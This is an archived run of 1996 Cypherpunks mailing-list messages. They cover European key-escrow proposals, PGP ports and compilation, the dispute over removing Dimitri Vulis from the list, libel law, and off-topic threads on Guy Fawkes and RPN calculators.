Subject: Re: News: Europe Wants Stronger Encryption
In-Reply-To: <199611052315.PAA12733@ohio.chromatic.com>
Message-ID: <9611070850.aa15503@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua wrote:
> 
> From C/Net News (http://www.news.com/News/Item/0,4,5076,00.html):
> 
>     Europe wants stronger encryption 
>     By Alex Lash
>     November 5, 1996, 5:30 a.m. PT 
> 
>     The European Electronic Messaging Association has told
>     the European Commission that European companies are at a
>     competitive disadvantage without access to strong
>     American-made cryptography, according to the
>     organization. 

Well, they've obviously been paying attention, haven't they? Doh!

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jenaer Mixmaster Anonserver <mixmaster@as-node.jena.thur.de>
Date: Thu, 7 Nov 1996 02:24:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mixmaster Test
Message-ID: <m0vLPKi-0003inC@as-node.jena.thur.de>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, folks ... just looking for a mixmaster that puts
the Subject: line into cypherpunk messages.

Name-Withheld-By-Request
Editor in Chief, Cypherpunk Enquirer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nicolas J. Hammond" <njhm@ns.njh.com>
Date: Thu, 7 Nov 1996 05:58:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: HAPPY GUY FAWKES DAY!
In-Reply-To: <Pine.A32.3.93.961106224202.67998A-100000@gpu5.srv.ualberta.ca>
Message-ID: <199611071359.IAA29100@ns.njh.com>
MIME-Version: 1.0
Content-Type: text/plain


> > >                           SANDY SANDFORT
> > > 
> > > On this day in 1605 the Gunpowder Plot was foiled.  Guy Fawkes
> > > and his compatriots had intended to blow up Parliment.

Actually I think it was late on November 4 that the plot was foiled.

Guy (Guido) Fawkes and 11 of this friends had rented a house next to the 
Houses of Parliament earlier that year and the group spent several months 
digging a tunnel from the basement of their house to the basement of the HoP.

They moved barrels and barrels of gunpowder into the basement and
left Guy Fawkes there along with a very long fuse on the night of
November 4. The King (James I of England, who was also James VI of Scotland)
was opening Parliament the following day. The plan was for Guy to light
the fuse, escape through the tunnel, and the whole of the HoP would
be blown up. There would be a catholic rebellion and a Catholic (I think
Queen, my memory is failing at this point) monarch installed.

[King Henry VIII had fallen out with the Pope over his many marriages
 (rather ironic as an earlier Pope had declared KH8 "defender of the 
 faith", a title that is still used by the current Queen, because KH8
 had written many articles defending the Catholic faith) and KH8 had
 helped to start the Church of England. Many loyal catholics wanted to
 return to papist control of religion.]

For some reason (the speculation is either that one of the gang
tipped off a friend who was a Member of Parliament (MP) and 
therefore expected to be at the opening and told him not to attend
OR that the whole plot was concocted by the King to raise public
support for him (King wasn't too popular at the time)), the plot was foiled.

The Beefeaters (the guards who still wear their traditional uniform)
searched the basement, saw barrels and barrels of gunpowder and a long
fuse. At the end of the fuse was Guy Fawkes. They either did the search
late on November 4, or early in the morning on the fifth.

Guy was tortured for about 2 weeks. They used the water torture and
dismembered a few parts of his anatomy. A same fate met the other
conspirators that were captured alive. Guy's torture lasted about 2 weeks
and then he was hung, drawn and quartered with his head put on the city
walls for many months. He has hung, cut down before he was dead,
drawn (large cuts made in the body with a sharp sword - makes
the quartering easier on the horses) and then quartered (each limb tied
to a strong horse and the horses then sending charging in four opposite
directions).

No-one knows why the celebrations started. Some speculate that the King
ordered it to remember how close the rule of monarchy nearly came to an end.

Traditional English celebrations are to have a large bonfire and put a 
guy (mannequin) on top. Kids would spend weeks making a realistic looking
"guy" and used to (long time ago) put their guy on the streets a couple
of days before asking for "a penny for the guy" to make money.
Fireworks are also normal.

> > > The English celebrate it because Guy Fawkes failed.
> > > I celebrate it because he tried.  :-)
> > 
> > A terrorist!!!   Call the police!!
> > 
> 
> Where would we be if he hadn't tried?  

Catholic.


 Please to remember
 The fifth of November
 Gunpowder, treason and plot

 I see no reason
 Why gunpowder treason
 Should ever be forgot
	[Traditional English nursery rhyme]

Not quite sure the relevance to cryptography.
I believe that at their "trial", some documents were produced - 
I doubt they were encrypted.

-- 
Nicolas Hammond                                 NJH Security Consulting, Inc.
njh@njh.com                                     211 East Wesley Road
404 262 1633                                    Atlanta
404 812 1984 (Fax)                              GA 30305-3774




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Wed, 6 Nov 1996 15:32:10 -0800 (PST)
To: Mark Allyn 206-860-9454 <allyn@allyn.com>
Subject: Re: black high heal shoes?
Message-ID: <3.0b36.32.19961107084309.006c75a0@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Mark,

>I had yet another strange dream recently:

You gotta stop eating those pepperoni pizzas just before bed time!

:)

Regards,

Mark
Mark Neely - accessnt@ozemail.com.au
Lawyer, Internet Consultant, Professional Cynic & Author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 7 Nov 1996 06:11:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Smart Bombs
Message-ID: <9610078473.AA847386635@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Smart Use for Smart Cards
     
"UBIQ announced that its software has been selected by American Express to
personalize smart cards that will be issued ... for ticketless travel on
American Airlines. ... Airline travelers with these smart card holders will be
able to proceed directly to an airport gate, insert their smart card into a gate
reader, receive seat confirmation, and board the plane without touching a single
piece of paper. 
     
"Traditionally, smart card technology has been associated with user
authentication for computer systems or as an electronic alternative for cash.
This announcement takes the best of both worlds and looks to provide a
potentially innovative use for smart cards. ...

Copyright (c) 1996 Zona Research Inc. 

Of course, not having a card may subject you to greater scrutiny at check-in
time due to the reduced tracking ability. 

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Thu, 7 Nov 1996 02:23:44 -0800 (PST)
To: ietf-pkix@tandem.com
Subject: Euro Key Escrow
Message-ID: <9611070921.aa15606@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Someone, somewhere, posted a rumour that Europe was about to go for a key
escrow scheme known as "Royal Holloway".

I have done a little research and gleaned the following:

It is, apparently, true that the EC is considering schemes for key escrow, by
"trusted third parties" (trusted by who, I'd like to know?). "Royal Holloway"
is one of these schemes. It is named after the college of origin, if anyone
cares. It essentially revolves around each pair of TTPs sharing two out of
three parts of a key, and generating the third part for each of their users.
The idea is that either of the TTPs who generated keys for an encrypted
message exchange can decode it (by using the private key of their "client" and
the public key of the other TTP's "client").

Full details can be found at:

ftp://ftp.dcs.rhbnc.ac.uk/pub/Chris.Mitchell/istr_a2.ps

This is in PostScript. I'm not aware of any plain text versions.

I'm informed that this is likely to be introduced into EC legislation, though
my understanding is that members are not required to actually incorporate the
legislation. No doubt France will embrace it with happy shouts.

Of course, it is our duty as netizens to resist this kind of rubbish, and I
encourage you to write to your MP/EuroMP (or local equivalent).

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Thu, 7 Nov 1996 00:57:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] [philosophypunks] [Vulis] Mills & Hallam-Baker
Message-ID: <199611070857.JAA01800@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 hallam@ai.mit.edu writes:
>
> If we return to the original basis on which Mill opposed censorship
> its not hard to find out why Dimitri is denied his support. The
> argument is based on the need to keep alive debate.


That was only one of several arguments.  Another was that the
potentially-censored speaker might be right!  I don't remember
the others.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMoGkZUjbHy8sKZitAQFmRgMAu2U+zQTa+txp2wz9SG6mQwS4MXXkgeDi
zjenNSN8KvwM92fxio5S+KfOzTjggU2dczeBuEAb7EPPJFUCtAh0ZEgYguzEnpAU
Vx2Ct06VOQbr0mRUlfuGbwgvX0fYnh0D
=Dqw6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 11:19:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Pseudo-law on the list and libel
In-Reply-To: <199611070327.VAA10208@einstein>
Message-ID: <v03007800aea7c8fe63ab@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



This is not a comment on the Vulis-Gilmore issue, about which much too much
has already been posted here. But I believe Jim Choate is quite wrong about
a point he makes:

At 9:27 PM -0600 11/6/96, Jim Choate wrote:
>Hi all,
>
>There is one important legal aspect which the operator of the Cypherpunks
>mailing list has opened themselves up for with this action. In short they
>have now opened themselves up for defamation and liable suites by imposing
>an editorial policy on the contents of this list (1).
>
>This opens up the potential, for example, for Tim May to sue the operator of
>the Cypherpunks mailing list now for posts from users (even anonymous ones)
>which defame or otherwise liable his character, reputation, or ability to
>pursue income in his chosen field. In short the operators of the list
>becomes publishers and distributors of the material. It is the legal
>difference between a bookstore and a book publisher.

So, if a bookstore ejects a drunken lout who is disturbing the other
patrons, is the bookstore suddenly reclassfied as a book publisher? By your
logic, you seem to think so.

So, if I have a party at my house and limit who I invite, or eject someone
who is misbehaving (insulting my other guests, barfing on the floor,
smoking when I tell him not to, whatever), you are saying that I "open
myself up for libel suits" by other guests who don't like the things they
hear from others at my party?

So, anyone who exercises ownership rights to his property suddenly becomes
legally responsible for the alleged misdeeds of anyone visiting his house?

Could you cite some cases supporting your point of view?

(I can think of some peripherally-related cases, such as cases where a bar
has been held liable (note: "libel" is not the same as "liable") for
serving too many drinks to someone already drunk. I happen to disagree with
this outcome, strongly. However, it is far from establishing that a bar
which enforces certain rules ("no shirt, no service") and which has an
entire class of employees hired to _eject_ patrons has suddenly become
liable for slanderous comments made by customers. And so on.)


>I have argued in the past that this list is a defacto public list because of
>the way it is advertised and to the extent it is advertised. All the protests
>by the operator to the contrary will not convince a court.
>
>Hope you folks have a good lawyer.

Pseudo-law on this list is really getting out of hand.

(By the way, I include my ideological usual-ally Black Unicorn on this
point. I'm chagrinned that he so quickly and on so many issues has made
statements about filing lawsuits--for defamation, for "false advertising"
(!!!!), and so on. Not only is this counter to the views many of us hold--I
think I sense the zeitgeist of the list--but it is supremely ineffective,
as none of these threatened lawsuits ever seem to materialize, thankfully.
Using the threat of a lawsuit as a rhetorical debating strategy is not
effective.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Mattsson" <michaelmattsson@momentis.com>
Date: Thu, 7 Nov 1996 07:08:28 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <19961107101043.08761e13.in@mail.momentis.com>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 7 Nov 1996 10:26:51 -0800 (PST)
To: kb4vwa@juno.com (Edward R. Figueroa)
Subject: Re: News: Europe Wants Stronger Encryption
In-Reply-To: <19961106.214507.5351.0.kb4vwa@juno.com>
Message-ID: <199611071826.KAA20610@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> I don't understand why don't they just use PGP, or something like that. 
> There is no patent on it?

IDEA is patented in Europe.  It takes a lot of time to test out and
"break in" new encryption algorithms.  If you invent one, surely the
first thing you would want to do is to patent it, right?  Well, that
is exactly what everyone's been doing so far.  Few, if any, actually
let their stuff go to the public domain.

Kudos to Bruce S for Blowfish ...

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 7 Nov 1996 20:08:47 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <Pine.LNX.3.94.961107043646.339A-100000@random.sp.org>
Message-ID: <32822B64.1142@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
> On Wed, 6 Nov 1996, Timothy C. May wrote:
> > At 2:44 PM -0800 11/5/96, Sean Roach wrote:
> > >If I remember my history right, the order that math was done often depended
> > >on the model of calculator it was done on.  I remember being warned as late
> > >as 1991 how some calculators may still still add before they multiply, and
> > >to use those parenthesis for good measure, just to be safe.

> > Well, it ain't _history_ only--it's also current. Some of us use RPN
> > (Reverse Polish Notation) calculators exclusively. (Even my screen
> > calculator I use on my Mac is an RPN one.)

> Yes, many calculators still have the add/multiply error also.  Most of the
> newer generation (the one which I wish I didn't have to be a part of)
> doesn't know what RPN is, much less how to use it.

> A friend of mine found his father's RPN HP (don't know which model) from
> college a week or two ago, and you'd never beleive how long it took me to
> convince him that "RPN" really does stand for "Reverse Polish Notation".
> As for slide rules, I think I'm the only person at my school who knows
> what a slide rule _is_, much less how to use one ;)

According to HP, the "Polish" part of the term comes from a Polish mathematician whose
name (I can't spell it, and I don't have the .DOC) is pronounced phonetically:
WOOCASHEVITZ.  The "reverse" part apparently means the inventor specified the 
operation before the parameters, instead of how HP implemented it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 7 Nov 1996 10:56:05 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: [rant] Re: Censorship on cypherpunks
Message-ID: <199611071856.KAA18731@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 PM 11/6/96 -0800, Dale Thorn wrote:
>What both of these arguments (moreso the first) fail to mention is an
individual's
>investment in time and possibly a lot of money in various memberships, with
expec-
>tations that they will have the opportunity to develop and express
themselves to
>their utmost capability.  When I have a problem with some of the dirty
things my
>representatives in Washington DC do on my behalf, people say "like the U.S. or
>leave it", etc., as though my father, his father, his father, etc. clear
back to
>the 1600's in the colonies here, wasted their blood on the battlefields
defending
>these assholes who like to say "you can just leave if you don't like it".
>
>The squashing of people's dreams begins at birth with selfish and shortsighted
>parents, and since that and other oppressions permeates our brains at every
level, 
>it's a wonder that some people are as accomplished and expressive as they
are.  This
>topic as it's been handled so far by most of the subscribers is prima facie
evidence
>that most of the people in the industrialized countries are just good
little suck-up
>fascists.

Actually, I was comparing some people on the list, who were saying someone
could always start thier own list, with those who advocate telling someone
to start a new country as opposed to making their vote count.  This is a
free country where we, fortunately, don't have to hang around, and, this is
a free list, where we don't have to post or remain subscribers.  I was
saying that telling someone to start their own list was equivalent to
telling them to dig in on an uninhabited island.  I was never advocating
either action.  If you read the previous posts, you can see the one I
responded to and see what I mean.  I know that this may not be possible as
you probably tossed them, but ask me if you would like, I have that post
somewhere in backup.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Thu, 7 Nov 1996 11:17:47 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Information [for new PGP user]
Message-ID: <3.0b36.32.19961107111639.00d927d4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 AM 11/7/96 -0800, Dale Thorn wrote:
>stewarts@ix.netcom.com wrote:

>> You can read and compile the source code yourself.
>
>[snip, snip]
>
>Really?  All 60,000 or so lines, including all 'includes' or attachments?
>
>I'll bet you can't find 10 out of 1,000 users who have read the total source,
>let alone comprehended and validated it.

Depending on the system, compiler and version of PGP, compilation may or
may not function as expected.

I have had a number of odd problems compiling the code for the PC over the
years.  (It has always compiled easily on the Unix boxes I have used.)  The
"gorrila" version on the Cypherpunks FTP site does not want to compile at
all.  (It wanted specific libraries that were not in the version of the
compiler I was using.)  Microsoft's compiler had a few odd problems as well
with some of the earlier versions.  (I think I was compiling PGP 2.6 with
VC++ 7.0.)

Also, you have to have the compiler in the first place.  The latest
compilers are getting pretty big.  (100+ megs!)  Most people either do not
have the disk space, the money for them (or do not know where to get free
ones), or the needed arcane knowledge to get the compile to happen at all.
(And if there was a subtile bug in the code, most people would not be able
to find it.  This includes many programmers.)

BTW, there is a Windows95 console version of the International version.
(Check out http://www.ifi.uio.no/pgp/download.shtml for versions
available.)  It is the "non-us approved" version, so use at your own risk.

My problem with PGP is that there is no protection for information on what
keys are on your secret keyring.  It would be quite possible to create a
program that read the keyring and saved off the names of all nyms and
truenames it found there.  (It would make it quite easy to then find out
that "Nym X" is associated with "User Y".)  And with Active X, it could be
offloaded to a remote site without anyone being the wiser...

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Nov 1996 11:31:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] [philosophypunks] [Vulis] Mills & Hallam-Baker
In-Reply-To: <199611070857.JAA01800@digicash.com>
Message-ID: <wk81wD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <bryce@digicash.com> writes:
>  hallam@ai.mit.edu writes:
> >
> > If we return to the original basis on which Mill opposed censorship
> > its not hard to find out why Dimitri is denied his support. The
> > argument is based on the need to keep alive debate.
> 
> That was only one of several arguments.  Another was that the
> potentially-censored speaker might be right!  I don't remember

of course I'm right.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Nov 1996 11:34:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Vulis profile
In-Reply-To: <Pine.SCO.3.93.961106191634.23586E-100000@grctechs.va.grci.com>
Message-ID: <2T81wD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark O. Aldrich" <maldrich@grci.com> writes:

> On Wed, 6 Nov 1996, John Anonymous MacDonald wrote:
> 
> > I had some free time this morning, and just for fun, thought I'd 
> > create a brief Net profile of our friend Dr. Vulis.  Here's what 
> > I found (sources included):
> <snip>
> > Number of articles posted to individual newsgroups (slightly 
> > skewed by cross-postings): 
> <snip>
> >           4 alt.sex.plushies 
> <snip>
> 
> 
> You gotta be kidding me.

That's right. alt.sex.plushies is for people who have sex with plushy animals.
(My 4 cross-posts were actually a part of the thread about the censors who
forge cancels for articles in a.s.p that they consider off-topic. As you see,
the cypherpunks mailing list is not the only forum being censored.)
That was my only interest in a.s.p. Why, does Timmy May (fart) have sex with
plushy animals in addition to his two cats?  How disgusting.,
> 
> People, let's just not even get this started - everyone, close your eyes,
> take a few deep breathes, and repeat, "I'm not going to touch this - I'm
> not going to touch this - I'm not going to touch this." 
> 
Mark, I found Misha Verbitsky'd writing about me very amusing.  As long as
one realizes that he's making it all up, it's very funny. He has more stuff
as his Harvard site, about Alex Thurston and Rabbi Shlomo Ruthenberh who he
claims are my tentacles. Check it out.

(But when someone is stupid enough to run around citing a work of fiction as
if it were true, the way Timmy May (fart) does, that person is clearly an idio
t.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 7 Nov 1996 08:36:51 -0800 (PST)
To: "Nicolas J. Hammond" <njhm@ns.njh.com>
Subject: Re: HAPPY GUY FAWKES DAY!
In-Reply-To: <199611071359.IAA29100@ns.njh.com>
Message-ID: <Pine.SUN.3.91.961107113216.12183A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Nicolas J. Hammond wrote:
> 
> Not quite sure the relevance to cryptography.
> I believe that at their "trial", some documents were produced - 
> I doubt they were encrypted.

Well, Mary Queen Of Scots's secret communications relied on concealing 
messages in bottles whilst under arrest. This channel was discovered, and 
all here messges were intercepted and read before being passed on. 

Security thru Obscurity just doesn't work...









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Thu, 7 Nov 1996 04:52:20 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Is there a Win PGP?
In-Reply-To: <1.5.4.32.19961107072438.00dad0cc@popd.ix.netcom.com>
Message-ID: <9611071151.aa16242@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com wrote:
> 
> At 10:58 PM 11/6/96 -0500, you wrote:
> >subject says it all.... Im just wondering is (and where) there is a windows
> >version of PGP.. thanks!
> 
> There are two separate issues - PGP with a Windows GUI, and 
> PGP that really runs as a Windows process, rather than needing
> to fire up a DOS window.  There are a dozen or so Windows GUIs for PGP,
> many of which are on ftp.ox.ac.uk.  I especially like Private Idaho;
> I think the path to it is www.eskimo.com/~joelm/ (also ftp.eskimo.com).
> Current version is about 2.8 ; I'm not running it because it dropped
> support for ViaCrypt (due to problems with ViaCrypt 4.0), and I like
> using ViaCrypt.  I'm also having problems getting the older versions
> to work on Windows NT (sigh...)
> 
> For a real Windows version, you can buy ViaCrypt (about $100-130?)
> At least inside the US, to use the interesting RSA methods except through the
> official external interfaces to RSAREF, you need permission from RSA.
> Basic PGP for DOS/Unix/Mac has this, but there isn't a blessed Windows 
> version except ViaCrypt, a commercial product.  For commercial applications,
> you probably also need ViaCrypt anyway.  It was a nice product before they
> added Key Escrow support.  Now that Phil has bought them, they'll presumably
> return to political correctness on that issue.

I did a port of PGP to a Windows DLL a long time back, but I never got around
to releasing it. I could bring it up to date and put it out there if there is
popular demand.

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Nov 1996 08:49:15 -0800 (PST)
To: "Nicolas J. Hammond" <cypherpunks@toad.com
Subject: Re: HAPPY GUY FAWKES DAY!
Message-ID: <3.0b19.32.19961107101629.0072e5fc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>The Beefeaters (the guards who still wear their traditional uniform)
>searched the basement, saw barrels and barrels of gunpowder and a long
>fuse. At the end of the fuse was Guy Fawkes. They either did the search
>late on November 4, or early in the morning on the fifth.

The powder had spoiled because it had been stored too long without being
turned over.  It wouldn't have blown up in any case.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 7 Nov 1996 12:10:56 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Pseudo-law on the list and libel
In-Reply-To: <v03007800aea7c8fe63ab@[207.167.93.63]>
Message-ID: <199611072010.MAA11330@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCM
>(By the way, I include my ideological usual-ally Black Unicorn on this
>point. I'm chagrinned that he so quickly and on so many issues has made
>statements about filing lawsuits--for defamation, for "false advertising"
>(!!!!), and so on. Not only is this counter to the views many of us hold--I
>think I sense the zeitgeist of the list--but it is supremely ineffective,
>as none of these threatened lawsuits ever seem to materialize, thankfully.
>Using the threat of a lawsuit as a rhetorical debating strategy is not
>effective.)

heh, I find Unicorn's zeal to sue anyone for anything quite comical
and suggestive of a high degree of immaturity.

but as to your point, the recent Forbes article on Bidzos makes it
clear that weilding a legal sword alone can be used quite
shrewdly, strategically, and effectively. 
the article is quite interesting in how it suggests
RSA was largely built on threatening to sue people. of course this
is slightly skewed, because RSA has done things like software
development that the article didn't mention.

actually the lesson seems to be that if you have a software
patent, the law can be your friend (esp. if you are a business), 
but if you want to sue someone who calls you names, the law is not very
accommodating. sorry, Unicorn, maybe you can lobby to fix this
little deficiency. <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 12:23:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why is cryptoanarchy irreversible?
Message-ID: <v02140b07aea7f1963f8c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


It appears to be widely believed that cryptoanarchy is irreversible.
Everybody believes that the race to deploy or forbid strong cryptography
will define the outcome for a long time.

I can't think of a reason why this should be so.

If the wide use of strong cryptography results in widely unpopular
activities such as sarin attacks and political assassinations, it
would not be all that hard to forbid it, even after deployment.

I am curious why many people believe this is not true.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Thu, 7 Nov 1996 10:43:15 -0800 (PST)
To: ravage@EINSTEIN.ssz.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT] (fw
Message-ID: <199611071842.MAA04703@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> Hi all,
> 
> There is one important legal aspect which the operator of the Cypherpunks
> mailing list has opened themselves up for with this action. In short they
> have now opened themselves up for defamation and liable suites by imposing
> an editorial policy on the contents of this list (1).

First of all I support John's decision.

However, these types of actions make it difficult to further any 
common carrier legal development.  As most on the list will agree, we 
would like certain content freedom on the Net.  When the SPA 
discussed thier contributory infringement we all cringed (especially 
those running small ISPs).

My point is that this decision should be based upon anything but 
content.  Arguments can be made that the Dr. "asked" to be removed by 
techincal means.  Arguments can be made that the Doctor abused 
remailers (assuming a writing analysis can identify him and that 
"abused" has any definition 8-).  Saying that the Doctor was 
decreasing the S/N ratio IS content based restriction.  It DOES open 
up the door.

> This opens up the potential, for example, for Tim May to sue the operator of
> the Cypherpunks mailing list now for posts from users (even anonymous ones)
> which defame or otherwise liable his character, reputation, or ability to
> pursue income in his chosen field. In short the operators of the list
> becomes publishers and distributors of the material. It is the legal
> difference between a bookstore and a book publisher. 

While I wish he was wrong, I have to agree.

> Censorship is censorship, irrespective of the source of the limitation.
> Free expression is impossible in an environment of censorship. The right to
> speak not only implies a right to not speak, it also implies the right to
> emit complete mumbo jumbo. The actual content of the speech is irrelevant.

That is not completely true in the USA.  Content can and is 
restrained.  You cant yell "FIRE" in a crowded theatre.  Commercial 
speech is restrained.  And, yes, sexually explicit language used on a 
jobsite is effectively restrained (I am a discrimination lawyer, 
believe me, it is).
 
> I have argued in the past that this list is a defacto public list because of
> the way it is advertised and to the extent it is advertised. All the protests
> by the operator to the contrary will not convince a court.

All of the "advertisements" and their "extent" are totally 
irrelevant.  John does not advertise.  Members might.  So what?  Am I 
to understand that if I get enough people to tell others that my 
favorite privately held company is really a public one that I can 
then have a court force them to make an IPO?  It is private, it is 
controlled by John, not the government (unless that white van outside 
his house is actually filtering his packets 8-).

> 
> Hope you folks have a good lawyer.
> 

Very happy to volunteer my services.

> (1)  ;login:, Oct. 1996, V21N5, pp. 27
> 
> 
>                                                     Jim Choate

Matt 
 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDq+FoAAAEEANM9+JcJmUp4aCSGpdOG4Y1b6m4630XA8H41Utbvr7Tr6wEH
CD6tlxZ+k+Pycj4w/f8WQa8fC50skoLjUNeP4lYsR7NYaMGRp6WkqCLMI/3Nohvk
pfLDqnzZZdwVL2liB7mfTURoF6doQaVehHmMBjSaVTfD12tzNGm6VvyEc77JAAUR
tClNYXR0aGV3IEouIE1pc3pld3NraSA8bWptaXNraUBleGVjcGMuY29tPg==
=lkx1
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hendra Halim <mestimas@elang.idola.net.id>
Date: Wed, 6 Nov 1996 21:40:22 -0800 (PST)
To: CYPHERPUNKS@toad.com
Subject: Re: FW: Now we have it all
Message-ID: <9611070543.AA26834@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: tcmay@mail.got.net
>Date: Wed, 6 Nov 1996 10:04:52 -0800
>To: CYPHERPUNKS@toad.com
